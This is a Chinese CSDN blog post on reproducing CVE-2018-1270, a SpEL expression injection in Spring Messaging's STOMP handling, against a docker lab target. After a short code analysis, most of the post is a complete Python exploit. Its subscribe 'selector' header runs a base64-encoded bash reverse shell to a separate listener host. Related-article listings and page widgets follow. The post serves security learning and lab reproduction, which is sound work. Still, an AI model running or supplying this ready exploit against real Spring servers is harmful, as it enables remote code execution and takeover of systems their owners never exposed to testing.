spring常见漏洞(4)

最新推荐文章于 2024-09-17 06:12:15 发布
最新推荐文章于 2024-09-17 06:12:15 发布
阅读量877 收藏 7
点赞数 22
文章标签: spring java 后端 web安全 网络 安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80520893/article/details/135520986
版权
本文详细描述了Spring框架中SpringMessaging模块的STOMP协议实现存在的SPEL表达式注入漏洞,攻击者可通过构造恶意消息进行远程代码执行,影响了SpringFramework5.0.5和4.3.15版本。文章提供了漏洞复现步骤和PoC代码实例。
摘要由CSDN通过智能技术生成

CVE-2018-1270

Spring Messaging 命令执行漏洞(CVE-2018-1270),Spring框架中的 spring-messaging 模块提供了一种基于WebSocket的STOMP协议实现,STOMP消息代理在处理客户端消息时存在SpEL表达式注入漏洞,攻击者可以通过构造恶意的消息来实现远程代码执行。

影响版本

Spring Framework 5.0 - 5.0.5 Spring Framework 4.3 - 4.3.15

漏洞分析

expressiongetValuesetValue造成的代码执行,造成这种命令执行是由Spring的SPEL表达式造成的

SPEL命令执行有两种方式,一是静态方法,二是new 对象

再看一下spring-boot-messaging实现中的代码

Expression expression = sub.getSelectorExpression();
if (expression == null) {
    result.add(sessionId, subId);
} else {
    if (context == null) {
        context = new StandardEvaluationContext(message);
        context.getPropertyAccessors().add(new DefaultSubscriptionRegistry.SimpMessageHeaderPropertyAccessor());
    }

    try {
        if (Boolean.TRUE.equals(expression.getValue(context, Boolean.class))) {
            result.add(sessionId, subId);
        }
    } catch (SpelEvaluationException var13) {
        if (this.logger.isDebugEnabled()) {
            this.logger.debug("Failed to evaluate selector: " + var13.getMessage());
        }
    } catch (Throwable var14) {
        this.logger.debug("Failed to evaluate selector", var14);
    }
}

 

那么一是可以利用sub.getSelectorExpression()得到selector的表达式,二是利用Boolean.TRUE.equals(expression.getValue(context, Boolean.class))获取表达式的值,从而造成命令执行

漏洞复现

进入CVE-2018-1270的docker漏洞环境

访问http://192.168.1.10:8080/gs-guide-websocket

这里直接使用前辈们写好的exp,注意修改一下bash命令和靶机地址即可

#!/usr/bin/env python3
import requests
import random
import string
import time
import threading
import logging
import sys
import json
 
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
 
def random_str(length):
    letters = string.ascii_lowercase + string.digits
    return ''.join(random.choice(letters) for c in range(length))
 
 
class SockJS(threading.Thread):
    def __init__(self, url, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}'
        self.daemon = True
        self.session = requests.session()
        self.session.headers = {
            'Referer': url,
            'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'
        }
        self.t = int(time.time()*1000)
 
    def run(self):
        url = f'{self.base}/htmlfile?c=_jp.vulhub'
        response = self.session.get(url, stream=True)
        for line in response.iter_lines():
            time.sleep(0.5)
     
    def send(self, command, headers, body=''):
        data = [command.upper(), '\n']
 
        data.append('\n'.join([f'{k}:{v}' for k, v in headers.items()]))
         
        data.append('\n\n')
        data.append(body)
        data.append('\x00')
        data = json.dumps([''.join(data)])
 
        response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data)
        if response.status_code != 204:
            logging.info(f"send '{command}' data error.")
        else:
            logging.info(f"send '{command}' data success.")
 
    def __del__(self):
        self.session.close()
 
 
sockjs = SockJS('http://192.168.1.10:8080/gs-guide-websocket')
sockjs.start()
time.sleep(1)
 
sockjs.send('connect', {
    'accept-version': '1.1,1.0',
    'heart-beat': '10000,10000'
})
sockjs.send('subscribe', {
    'selector': "T(java.lang.Runtime).getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMi81NTU1IDA+JjE=}|{base64,-d}|{bash,-i}')",
    'id': 'sub-0',
    'destination': '/topic/greetings'
})
 
data = json.dumps({'name': 'vulhub'})
sockjs.send('send', {
    'content-length': len(data),
    'destination': '/app/hello'
}, data)

 首先还是bash编码

修改exp中的靶机ip和反弹命令

sockjs = SockJS('http://192.168.1.10:8080/gs-guide-websocket')

sockjs.send('subscribe', {
    'selector': "T(java.lang.Runtime).getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMi81NTU1IDA+JjE=}|{base64,-d}|{bash,-i}')",

 如图所示

运行poc.py即可得到反弹shell

网安星星
关注
spring框架漏洞整理(Springboot漏洞)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-01 4236
2016年爆出的一个漏洞Springboot漏洞利用条件 至少知道一个触发 springboot 默认错误页面的接口及参数名 利用方法 Springboot漏洞步骤一:找到一个正常传参处 比如发现访问/article?id=xxx,页面会报状态码为 500 的错误:Whitelabel Error Page,则后续 payload 都将会在参数 id 处尝试。 Springboot漏洞步骤二:执行 SpEL 表达式
spring框架漏洞整理(Spring Framework漏洞)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-01 1553
spring框架漏洞整理之Spring Framework漏洞(CVE-2015-5211)Spring Framework 内容协商机制(content-negotiation)反射型文件下载(RFD)。 RFD,即 Reflected File Download 反射型文件下载漏洞,是一个 2014 年来自 BlackHat 的漏洞。这个漏洞在原理上类似 XSS,在危害上类似 DDE:攻击者可以通过一个 URL 地址使用户下载一个恶意文件,从而危害用户的终端 PC。 这个漏洞很罕见,大多数公司会认为它是
Spring Boot Actuator 漏洞复现合集
drnrrwfs的博客
06-12 9758
Spring Boot Actuator 未授权访问漏洞在日常的测试中还是能碰到一些的,这种未授权在某些情况下是可以达到RCE的效果的,所以还有有一定价值的,下面就是对这一系列漏洞复现。基本上就是参考这篇文章的做的复现:LandGrey/SpringBootVulExploit: SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list (github.com)Spring Boot Actuator端点通过 JMX 和HTTP 公开暴露给外界访问,大多数时候我们使用基
Spring框架常见漏洞
最新发布
本散修的一些学习心得与笔记,道友请自便。
09-17 819
本篇文章主要是内容常见Spring漏洞的解析以及理解。
CVE-2018-1270-Spring Messaging RCE漏洞复现
m0_58596609的博客
04-22 5893
CVE-2018-1270-Spring Messaging RCE漏洞复现
Spring Messaging 远程代码执行漏洞分析(CVE-2018-1270
mole_exp的博客
02-26 8419
Spring Messaging 远程代码执行漏洞分析(CVE-2018-1270
Spring Messaging
来啊 快活啊
04-04 5916
Introducation Spring Messaging 属于Spring Framework项目,其定义了Enterprise Integration Patterns典型实现的接口及相关的支持(注解,接口的简单默认实现等); Contract 消息系统中的Pipes and Filters模型。就如其名字所描述的那样,该模型主要由两部分组成:用来传递消息的通道(Pipe)以及用来...
Spring message(CVE-2018-1270)在IDEA中进行复现
wxzyyds的博客
11-14 862
本片文章主要复现了Spring messaging(CVE-018-1270)的漏洞复现,依旧是由于对于spel没有进行过滤而导致的远程RCE,对于漏洞的成因,本文也依据IDEA进行的复现,最终找到进行SPEL注入的根本原因
Java框架之spring 的 messaging
wang0907的博客
06-28 2011
本文看下spring message相关的内容。
Spring Rce 漏洞分析CVE-2022-22965
热门推荐
god_Zeo的安全博客
04-07 1万+
0x01 漏洞介绍 Spring Framework 是一个开源的轻量级J2EE应用程序开发框架。 3月31日,VMware发布安全公告,修复了Spring Framework中的远程代码执行漏洞CVE-2022-22965)。在 JDK 9 及以上版本环境下,可以利用此漏洞在未授权的情况下在目标系统上写入恶意程序从而远程执行任意代码。 0x02 影响范围 影响组件:org.springframework:spring-beans 影响版本:< 5.3.18 和 < 5.2.20.RELEAS
Spring系列学习SpringMessaging消息支持
01-27
SpringFramework为与消息传递系统的集成提供了广泛的支持,从使用JmsTemplate简化JMSAPI的使用到异步接收消息的完整基础结构。SpringAMQP为高级消息队列协议提供了类似的功能集。SpringBoot还为RabbitTemplate和RabbitMQ提供自动配置选项。SpringWebSocket本身包含对STOMP消息传递的支持,SpringBoot通过启动器和少量自动配置支持它。SpringBoot也支持ApacheKafka。javax.jms.ConnectionFactory接口提供了一种创建javax.jms.Connectio
紧急!Spring Boot安全漏洞
wjianwei666的专栏
06-08 567
Spring Boot Actuator 模块提供了 Spring Boot 生产就绪的所有功能。Actuator提供的所有接口可让你监控应用程序各种信息并与之交互。Spring Boot 包含许多内置接口,你还可以添加自定义的接口。例如,health 接口提供基本的应用程序健康信息。有关Actuator的更多介绍可以查看官方文档,本篇文章主要讲解关于在生产环境中对Actuator的使用或控制不当,可能会引发安全隐患。为了避免这些问题,我们需要谨慎配置和使用Actuator。
java框架漏洞_Spring 框架漏洞集合
weixin_42514750的博客
02-25 5612
虽说是Spring框架漏洞,但以下包含并不仅Spring Framework,Spring Boot,还有Spring Cloud,Spring Data,Spring Security等。CVE-2010-1622 Spring Framework class.classLoader类远程代码执行影响版本:SpringSource Spring Framework 3.0.0 - 3.0.2、S...
spring常见漏洞(1)
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
01-14 578
Spring Security OAuth RCE(cve-2016-4977),是为Spring框架提供安全认证支持的一个模块,在7月5日其维护者发布了这样一个升级公告,主要说明在用户使用来处理错误时,攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。漏洞的发现者在10月13日公开了该漏洞的挖掘记录。
Spring框架漏洞(附修复方法)
C233333235的博客
08-07 1018
SpringJava EE编程领域的一个轻量级开源框架,该框架由一个叫Rod Johnson的程序员在2002年最早提出并随后创建,是为了解决企业级编程开发中的复杂性,业务逻辑层和其他各层的松耦合问题,因此它将面向接口的编程思想贯穿整个系统应用,实现敏捷开发的应用型框架。框架的主要优势之一就是其分层架构,分层架构允许使用者选择使用哪一个组件,同时为J2EE应用程序开发提供集成的框架。
spring源码分析之spring-messaging模块详解
04-23 956
0 概述 spring-messaging模块为集成messaging api和消息协议提供支持。 其代码结构为: 其中base定义了消息Message(MessageHeader和body)、消息处理MessageHandler、发送消息MessageChannel。 1. base模块 其结构如下所示: 其中: message由两部分组成, Message...
SpringMessaging命令执行漏洞 cve-2018-1270
whatday的专栏
07-07 2341
漏洞概述 https://pivotal.io/security/cve-2018-1270 STOMP(Simple Text Orientated Messaging Protocol)全称为简单文本定向消息协议,它是一种在客户端与中转服务端(消息代理Broker)之间进行异步消息传输的简单通用协议,它定义了服务端与客户端之间的格式化文本传输方式。已经在被许多消息中间件与客户端工具所支持。STOMP协议规范:https://stomp.github.io/stomp-specification-1.
权限绕过漏洞
rane的博客
04-01 2295
目录水平越权案例漏洞原理分析测试实例防御方案 靶场:https://github.com/zhuifengshaonianhanlu/pikachu 搭建方法和sqli-labs相同 水平越权案例 A和B属于同一级别用户,但各自不能操作对方个人信息。A如果越权操作B用户个人信息的情况称为水平越权操作,通过水平越权漏洞实现修改或删除其他用户的个人信息 随机登录一个用户,点击查看个人信息,此处用的是v...
spring boot漏洞
08-10
Spring Boot是一个流行的Java框架,它简化了构建生产级应用的过程。然而,像所有软件一样,Spring Boot项目也可能受到各种安全漏洞的影响。以下是几个常见Spring Boot安全漏洞类型: 1. **依赖注入漏洞(Dependency Injection Vulnerabilities)**:第三方库的更新如果没有及时跟进,可能会引入新的漏洞,比如依赖注入攻击,攻击者可以利用这些漏洞获取敏感数据或控制系统。 2. **跨站脚本攻击(XSS)**:当应用程序未能正确过滤用户输入,可能导致恶意脚本插入网页,影响用户体验或窃取用户信息。 3. **CSRF(Cross-Site Request Forgery)**:Spring Boot本身不会阻止CSRF攻击,如果不注意防护,恶意用户可能利用此漏洞执行未授权操作。 4. **认证和授权漏洞**: 如果身份验证机制设计不足或者密码存储不当,可能会导致账户被盗用。 为了保护Spring Boot应用,开发者应定期扫描依赖库更新,启用安全功能如CSRF令牌、输入验证,同时遵循Spring Security的最佳实践。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值